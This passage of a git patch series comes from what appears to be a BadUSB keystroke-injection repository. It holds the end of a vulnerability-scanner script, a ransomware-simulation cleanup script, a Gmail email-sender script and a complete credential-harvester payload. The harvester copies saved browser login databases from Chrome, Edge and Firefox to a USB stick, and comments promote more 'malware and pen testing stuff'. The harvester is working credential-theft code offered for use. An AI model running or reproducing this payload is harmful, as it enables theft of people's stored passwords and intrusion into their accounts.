-Path $directoryPath -ChildPath "WindowsUpdate.log" +DELAY 200 +ENTER +DELAY 200 +STRING Get-WindowsUpdateLog -LogPath $updateLogPath +DELAY 200 +ENTER +DELAY 200 +STRING write-output "WindowsUpdate.log written to $updateLogPath" +DELAY 200 +ENTER +DELAY 200 +STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error getting Windows Update log: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-firewallstatus { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING netsh advfirewall show allprofiles +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking firewall status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-smbv1status { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-windowsoptionalfeature -online -featurename smb1protocol +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking SMBv1 status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING function check-antivirusstatus { +DELAY 200 +ENTER +DELAY 200 +STRING try { +DELAY 200 +ENTER +DELAY 200 +STRING get-mpcomputerstatus +DELAY 200 +ENTER +DELAY 200 +STRING } catch { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error checking antivirus status: $_" +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING check-passwordpolicy >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING audit-services >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-networksettings >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-softwarevulnerabilities >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING analyze-logs >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-openports >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-missingupdates >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-firewallstatus >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-smbv1status >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING check-antivirusstatus >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +REM Dynamically identify critical software from running processes and scheduled tasks +STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique +DELAY 200 +ENTER +DELAY 200 +STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique +DELAY 200 +ENTER +DELAY 200 +REM Combine running software and scheduled tasks +STRING $softwareList = @() +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($process in $runningSoftware) { +DELAY 200 +ENTER +DELAY 200 +STRING $softwareList += $process.Name +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING foreach ($task in $scheduledTasks) { +DELAY 200 +ENTER +DELAY 200 +STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun) +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +REM Remove duplicates and empty entries +STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" } +DELAY 200 +ENTER +DELAY 200 +REM Check CVEs for identified software +STRING foreach ($software in $softwareList) { +DELAY 200 +ENTER +DELAY 200 +STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion +DELAY 200 +ENTER +DELAY 200 +STRING if ($version) { +DELAY 200 +ENTER +DELAY 200 +STRING check-cve -productname $software -version $version >> $resultsFilePath +DELAY 200 +ENTER +DELAY 200 +STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10) +DELAY 200 +ENTER +DELAY 200 +STRING start-sleep -seconds $initialDelay +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Results saved to USB drive." +DELAY 200 +ENTER +DELAY 200 +STRING } else { +DELAY 200 +ENTER +DELAY 200 +STRING write-output "Error: USB drive MYUSB not found." +DELAY 200 +ENTER +DELAY 200 +STRING } +DELAY 200 +ENTER +DELAY 200 +STRING invoke-command -scriptblock $script +DELAY 200 +ENTER +DELAY 20000 +REM check out github.com/markcyber for more badusb/pen testing scripts and tools From 7a7a9c879cd004a1fd9389baddef6df5f7264c2a Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:43:39 -0400 Subject: [PATCH 11/33] Rename BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt to BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt --- .../{ => InfoGathering}/RansomwareSimCleanup.txt | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename BadUSB/MarkCyber-BadUSB/RansomwareSimulation/{ => InfoGathering}/RansomwareSimCleanup.txt (100%) diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt similarity index 100% rename from BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt rename to BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt From d9a69bc7ec146e2c2858760d0d3c350ea94ec0d1 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:44:34 -0400 Subject: [PATCH 12/33] Delete BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering directory --- .../InfoGathering/RansomwareSimCleanup.txt | 61 ------------------- 1 file changed, 61 deletions(-) delete mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt deleted file mode 100644 index 01776dbe..00000000 --- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/InfoGathering/RansomwareSimCleanup.txt +++ /dev/null @@ -1,61 +0,0 @@ -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%% -REM %%%%%%%%%%%%% **This can be ran multiple times if necessary** %%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -DELAY 1000 -GUI r -DELAY 2000 -STRING powershell -ENTER -REM increased delays to make sure each command can go through even on slower computers -DELAY 6000 -REM Define the locations using correct SpecialFolder enumerations -STRING $folders = @( -DELAY 1000 -ENTER -DELAY 1000 -STRING [System.Environment+SpecialFolder]::Desktop, -DELAY 1000 -ENTER -DELAY 2000 -STRING [System.Environment+SpecialFolder]::MyPictures, -DELAY 1000 -ENTER -DELAY 2000 -STRING [System.Environment+SpecialFolder]::MyMusic, -DELAY 1000 -ENTER -DELAY 2000 -STRING [System.Environment+SpecialFolder]::Downloads -DELAY 1000 -ENTER -DELAY 2000 -STRING ) -DELAY 1000 -ENTER -DELAY 3000 -REM Iterate over each location -STRING foreach ($folder in $folders) { -DELAY 1000 -ENTER -DELAY 1000 -STRING $path = [Environment]::GetFolderPath($folder) -DELAY 1000 -ENTER -DELAY 4000 -REM Get all .locked files in the path and rename them back -STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') } -DELAY 2000 -ENTER -DELAY 5000 -STRING } -DELAY 1000 -ENTER -DELAY 4000 -STRING exit -DELAY 1000 -ENTER From df9d6f886420366dd771f00b44678f0d5ff4cb7f Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:45:00 -0400 Subject: [PATCH 13/33] Create RansomwareSimCleanup.txt --- .../RansomwareSimCleanup.txt | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt new file mode 100644 index 00000000..c2d5af81 --- /dev/null +++ b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt @@ -0,0 +1,61 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%% +REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +GUI r +DELAY 2000 +STRING powershell +ENTER +REM increased delays to make sure each command can go through even on slower computers +DELAY 6000 +REM Define the locations using correct SpecialFolder enumerations +STRING $folders = @( +DELAY 1000 +ENTER +DELAY 1000 +STRING [System.Environment+SpecialFolder]::Desktop, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::MyPictures, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::MyMusic, +DELAY 1000 +ENTER +DELAY 2000 +STRING [System.Environment+SpecialFolder]::Downloads +DELAY 1000 +ENTER +DELAY 2000 +STRING ) +DELAY 1000 +ENTER +DELAY 3000 +REM Iterate over each location +STRING foreach ($folder in $folders) { +DELAY 1000 +ENTER +DELAY 1000 +STRING $path = [Environment]::GetFolderPath($folder) +DELAY 1000 +ENTER +DELAY 4000 +REM Get all .locked files in the path and rename them back +STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') } +DELAY 2000 +ENTER +DELAY 5000 +STRING } +DELAY 1000 +ENTER +DELAY 4000 +STRING exit +DELAY 1000 +ENTER From 70641c39fc0be9ce844c022edfeea8676d8523b4 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:46:03 -0400 Subject: [PATCH 14/33] Rename BadUSB/MarkCyber-BadUSB/CredentialHarvester.txt to BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt --- BadUSB/MarkCyber-BadUSB/{ => HackerStuff}/CredentialHarvester.txt | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename BadUSB/MarkCyber-BadUSB/{ => HackerStuff}/CredentialHarvester.txt (100%) diff --git a/BadUSB/MarkCyber-BadUSB/CredentialHarvester.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt similarity index 100% rename from BadUSB/MarkCyber-BadUSB/CredentialHarvester.txt rename to BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt From bf9e50b28f80f7b58d4ba452dc8bceefdacfdd4d Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:46:25 -0400 Subject: [PATCH 15/33] Rename BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt to BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt --- .../MarkCyber-BadUSB/{ => HackerStuff}/VulnerabilityScanner.txt | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename BadUSB/MarkCyber-BadUSB/{ => HackerStuff}/VulnerabilityScanner.txt (100%) diff --git a/BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt similarity index 100% rename from BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt rename to BadUSB/MarkCyber-BadUSB/HackerStuff/VulnerabilityScanner.txt From f945f6d2243af2b869fcc11af39089da8272398f Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:47:15 -0400 Subject: [PATCH 16/33] Update CredentialHarvester.txt --- BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt b/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt index e0d83e27..d7a27cea 100644 --- a/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt +++ b/BadUSB/MarkCyber-BadUSB/HackerStuff/CredentialHarvester.txt @@ -51,3 +51,4 @@ REM Close PowerShell STRING exit ENTER DELAY 500 +REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff From c97826b0776c2dbc03f757cd76ef984c34427d40 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:48:08 -0400 Subject: [PATCH 17/33] Update RansomwareSimCleanup.txt --- .../RansomwareSimulation/RansomwareSimCleanup.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt index c2d5af81..3be26299 100644 --- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt +++ b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt @@ -59,3 +59,4 @@ DELAY 4000 STRING exit DELAY 1000 ENTER +REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff From ddbaa6da6b412689cd405dc73976ed17a9ee5ea8 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:48:25 -0400 Subject: [PATCH 18/33] Update RansomwareSimMain.txt --- .../MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt index aef51165..b35bd533 100644 --- a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt +++ b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt @@ -88,4 +88,4 @@ DELAY 2000 STRING exit DELAY 500 ENTER -REM check out my github at github.com/markcyber for more badusb tools +REM check out my github at github.com/markcyber for more badusb & hacking type tools From fc7cca09e33dda519033c05d1bcdc8c4b2bb0ce9 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 14:54:40 -0400 Subject: [PATCH 19/33] Create BadUSB-MarkCyber --- BadUSB/BadUSB-MarkCyber | 1 + 1 file changed, 1 insertion(+) create mode 100644 BadUSB/BadUSB-MarkCyber diff --git a/BadUSB/BadUSB-MarkCyber b/BadUSB/BadUSB-MarkCyber new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber @@ -0,0 +1 @@ + From b6d7de450147f0f42fab11fc86129c8477ac5e0f Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 15:03:23 -0400 Subject: [PATCH 20/33] Delete BadUSB/BadUSB-MarkCyber --- BadUSB/BadUSB-MarkCyber | 1 - 1 file changed, 1 deletion(-) delete mode 100644 BadUSB/BadUSB-MarkCyber diff --git a/BadUSB/BadUSB-MarkCyber b/BadUSB/BadUSB-MarkCyber deleted file mode 100644 index 8b137891..00000000 --- a/BadUSB/BadUSB-MarkCyber +++ /dev/null @@ -1 +0,0 @@ - From 04f810f4ede30f6b321d02df56ceba15111c35c6 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 15:04:02 -0400 Subject: [PATCH 21/33] Rename EmailSender.txt to EmailSender.txt --- .../{MarkCyber-BadUSB => BadUSB-MarkCyber}/Emails/EmailSender.txt | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename BadUSB/{MarkCyber-BadUSB => BadUSB-MarkCyber}/Emails/EmailSender.txt (100%) diff --git a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt similarity index 100% rename from BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt rename to BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt From 0e66119e09fdd830a97efb1d07b810d1bd9ba634 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 15:04:42 -0400 Subject: [PATCH 22/33] Delete BadUSB/BadUSB-MarkCyber/Emails directory --- .../BadUSB-MarkCyber/Emails/EmailSender.txt | 42 ------------------- 1 file changed, 42 deletions(-) delete mode 100644 BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt diff --git a/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt deleted file mode 100644 index a3eadd1c..00000000 --- a/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt +++ /dev/null @@ -1,42 +0,0 @@ -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%% -REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%% -REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%% -REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%% -REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%% -REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -DELAY 1000 -GUI r -DELAY 500 -STRING chrome -ENTER -DELAY 1000 -STRING https://mail.google.com/mail/u/0/#inbox?compose=new -ENTER -DELAY 5000 -DELAY 1000 -STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO} -DELAY 500 -TAB -TAB -STRING {YOUR SUBJECT NAME} -TAB -STRING Hi {THEIR NAME} -ENTER -ENTER -STRING {CONTENTS OF THE EMAIL} -ENTER -ENTER -STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES} -ENTER -ENTER -STRING Respectfully, -ENTER -ENTER -STRING {YOUR NAME} -ENTER -CTRL ENTER -DELAY 5000 -DELAY 1000 -ALT F4 -REM Check out github.com/MarkCyber for more scripts From f665892aca1fe6d66ca3ebb1f03b3ca2b02adc4a Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 15:05:45 -0400 Subject: [PATCH 23/33] Create EmailSender.txt --- .../MarkCyber-BadUSB/Emails/EmailSender.txt | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt diff --git a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt new file mode 100644 index 00000000..f484d3ec --- /dev/null +++ b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt @@ -0,0 +1,41 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%% +REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%% +REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%% +REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%% +REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +GUI r +DELAY 500 +STRING chrome +ENTER +DELAY 1000 +STRING https://mail.google.com/mail/u/0/#inbox?compose=new +ENTER +DELAY 5000 +DELAY 1000 +STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO} +DELAY 500 +TAB +TAB +STRING {YOUR SUBJECT NAME} +TAB +STRING Hi {THEIR NAME} +ENTER +ENTER +STRING {CONTENTS OF THE EMAIL} +ENTER +ENTER +STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES} +ENTER +ENTER +STRING Respectfully, +ENTER +ENTER +STRING {YOUR NAME} +ENTER +CTRL ENTER +DELAY 5000 +DELAY 1000 +ALT F4 From bfd20c8921233ff69ecb118a5367a7db91d1e01f Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 16:23:31 -0400 Subject: [PATCH 24/33] Create EmailSender.txt --- .../BadUSB-MarkCyber/Emails/EmailSender.txt | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt diff --git a/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt new file mode 100644 index 00000000..f484d3ec --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt @@ -0,0 +1,41 @@ +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%% +REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%% +REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%% +REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%% +REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%% +REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +DELAY 1000 +GUI r +DELAY 500 +STRING chrome +ENTER +DELAY 1000 +STRING https://mail.google.com/mail/u/0/#inbox?compose=new +ENTER +DELAY 5000 +DELAY 1000 +STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO} +DELAY 500 +TAB +TAB +STRING {YOUR SUBJECT NAME} +TAB +STRING Hi {THEIR NAME} +ENTER +ENTER +STRING {CONTENTS OF THE EMAIL} +ENTER +ENTER +STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES} +ENTER +ENTER +STRING Respectfully, +ENTER +ENTER +STRING {YOUR NAME} +ENTER +CTRL ENTER +DELAY 5000 +DELAY 1000 +ALT F4 From fe1df5f6bf3a0dd5703dff27d9d1bcd8dc592dcc Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Tue, 21 May 2024 16:24:07 -0400 Subject: [PATCH 25/33] Create CredentialHarvester.txt --- .../HackStuff/CredentialHarvester.txt | 53 +++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt diff --git a/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt b/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt new file mode 100644 index 00000000..809d3759 --- /dev/null +++ b/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt @@ -0,0 +1,53 @@ +REM ################################################################################################################## +REM ############## This script was created by github.com/markcyber ############## +REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ############## +REM ############## The extracted data will require decryption ############## +REM ################################################################################################################## +REM Open PowerShell with elevated privileges +DELAY 1000 +GUI r +DELAY 500 +STRING powershell +DELAY 500 +ENTER +DELAY 1000 +REM Check if the USB drive exists +STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; +STRING if ($usbDrive -ne $null) { +ENTER +DELAY 500 +STRING cd $usbDrive; +ENTER +DELAY 500 +STRING mkdir BrowserData; +ENTER +DELAY 500 +STRING cd BrowserData; +ENTER +DELAY 500 +REM Copy Chrome Login Data to USB +STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; +STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } +ENTER +DELAY 500 +REM Copy Firefox Login Data to USB +STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; +STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } +ENTER +DELAY 500 +REM Copy Edge Login Data to USB +STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; +STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } +ENTER +DELAY 500 +STRING } +ENTER +DELAY 500 +REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC) +STRING echo off | clip +ENTER +DELAY 500 +REM Close PowerShell +STRING exit +ENTER +DELAY 500 From 